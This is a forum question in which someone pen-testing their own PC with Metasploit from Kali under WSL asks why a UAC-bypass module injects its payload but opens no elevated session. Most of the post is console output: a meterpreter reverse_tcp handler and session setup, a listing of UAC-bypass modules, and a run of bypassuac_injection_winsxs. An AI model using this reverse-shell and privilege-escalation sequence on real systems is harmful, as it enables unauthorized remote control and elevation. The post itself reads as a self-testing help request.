I was trying a pen-test on my PC by WSL and Kali and everything was fine until the payload was created and executed on my target PC, also getting a session back.
- After the first step, I get:
msf6 > use multi/handler [*] Using configured payload generic/shell_reverse_tcp msf6 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp payload => windows/meterpreter/reverse_tcp msf6 exploit(multi/handler) > set lhost 10.9.88.222 lhost => 10.9.88.222 msf6 exploit(multi/handler) > set lport 8080 lport => 8080 msf6 exploit(multi/handler) > start [-] Unknown command: start. msf6 exploit(multi/handler) > exploit [*] Started reverse TCP handler on 10.9.88.222:8080 [*] Sending stage (175174 bytes) to 10.9.0.1 [*] Meterpreter session 1 opened (10.9.88.222:8080 -> 10.9.0.1:54501) at 2021-01-07 13:08:04 +0530 meterpreter > - However, the main problem occurs here; I tried to bypass the UAC and gain system-level privileges, trying 4 - 6 modules, got via a search result after executing
search uac, and upon executingsearch uac, I get:meterpreter > background [*] Backgrounding session 1... msf6 exploit(multi/handler) > search uac Matching Modules ================ # Name Disclosure Date Rank Check Description - ---- --------------- ---- ----- ----------- 0 exploit/windows/local/ask 2012-01-03 excellent No Windows Escalate UAC Execute RunAs 1 exploit/windows/local/bypassuac 2010-12-31 excellent No Windows Escalate UAC Protection Bypass 2 exploit/windows/local/bypassuac_comhijack 1900-01-01 excellent Yes Windows Escalate UAC Protection Bypass (Via COM Handler Hijack) 3 exploit/windows/local/bypassuac_dotnet_profiler 2017-03-17 excellent Yes Windows Escalate UAC Protection Bypass (Via dot net profiler) 4 exploit/windows/local/bypassuac_eventvwr 2016-08-15 excellent Yes Windows Escalate UAC Protection Bypass (Via Eventvwr Registry Key) 5 exploit/windows/local/bypassuac_fodhelper 2017-05-12 excellent Yes Windows UAC Protection Bypass (Via FodHelper Registry Key) 6 exploit/windows/local/bypassuac_injection 2010-12-31 excellent No Windows Escalate UAC Protection Bypass (In Memory Injection) 7 exploit/windows/local/bypassuac_injection_winsxs 2017-04-06 excellent No Windows Escalate UAC Protection Bypass (In Memory Injection) abusing WinSXS 8 exploit/windows/local/bypassuac_sdclt 2017-03-17 excellent Yes Windows Escalate UAC Protection Bypass (Via Shell Open Registry Key) 9 exploit/windows/local/bypassuac_silentcleanup 2019-02-24 excellent No Windows Escalate UAC Protection Bypass (Via SilentCleanup) 10 exploit/windows/local/bypassuac_sluihijack 2018-01-15 excellent Yes Windows UAC Protection Bypass (Via Slui File Handler Hijack) 11 exploit/windows/local/bypassuac_vbs 2015-08-22 excellent No Windows Escalate UAC Protection Bypass (ScriptHost Vulnerability) 12 exploit/windows/local/bypassuac_windows_store_filesys 2019-08-22 manual Yes Windows 10 UAC Protection Bypass Via Windows Store (WSReset.exe) 13 exploit/windows/local/bypassuac_windows_store_reg 2019-02-19 manual Yes Windows 10 UAC Protection Bypass Via Windows Store (WSReset.exe) and Registry 14 post/windows/gather/win_privs normal No Windows Gather Privileges Enumeration 15 post/windows/manage/sticky_keys normal No Sticky Keys Persistance Module Interact with a module by name or index. For example info 15, use 15 or use post/windows/manage/sticky_keys
I tried Module 7, receiving:msf6 exploit(multi/handler) > use 7 [*] No payload configured, defaulting to windows/meterpreter/reverse_tcp msf6 exploit(windows/local/bypassuac_injection_winsxs) > show targets Exploit targets: Id Name -- ---- 0 Windows x86 1 Windows x64 msf6 exploit(windows/local/bypassuac_injection_winsxs) > set target 1 target => 1 msf6 exploit(windows/local/bypassuac_injection_winsxs) > set payload windows/x64/meterpreter/reverse_tcp payload => windows/x64/meterpreter/reverse_tcp msf6 exploit(windows/local/bypassuac_injection_winsxs) > set session 1 session => 1 msf6 exploit(windows/local/bypassuac_injection_winsxs) > set LHOST 10.9.88.222 LHOST => 10.9.88.222 msf6 exploit(windows/local/bypassuac_injection_winsxs) > set LPORT 8080 LPORT => 8080 msf6 exploit(windows/local/bypassuac_injection_winsxs) > run [*] Started reverse TCP handler on 10.9.88.222:8080 [+] Windows 10 (10.0 Build 18363). may be vulnerable. [*] UAC is Enabled, checking level... [+] Part of Administrators group! Continuing... [+] UAC is set to Default [+] BypassUAC can bypass this setting, continuing... [*] Creating temporary folders... [*] Uploading the Payload DLL to the filesystem... [*] Spawning process with Windows Publisher Certificate, to inject into... [+] Successfully injected payload in to process: 9248 [*] Exploit completed, but no session was created. msf6 exploit(windows/local/bypassuac_injection_winsxs) >- Everything goes fine, but the session is not created, receiving:
exploit completed but no session was created - I get this on running with verbose mode on
[*] Started reverse TCP handler on 10.9.88.222:8080 [+] Windows 10 (10.0 Build 18363). may be vulnerable. [*] UAC is Enabled, checking level... [*] Checking admin status... [+] Part of Administrators group! Continuing... [+] UAC is set to Default [+] BypassUAC can bypass this setting, continuing... [*] Creating temporary folders... [*] Uploading the Payload DLL to the filesystem... [*] Payload DLL 8704 bytes long being uploaded... [*] Spawning process with Windows Publisher Certificate, to inject into... [*] Injecting into process ID 10880 [*] Opening process 10880 [*] Injecting struct into 10880 [*] Executing payload [+] Successfully injected payload in to process: 10880 [*] Exploit completed, but no session was created. - I used
Portmap.ioto port forward (free plan), and have the latest versions of the Metasploit framework, WSL 2, and the Kali Linux app installed
- Everything goes fine, but the session is not created, receiving:
How do I troubleshoot this?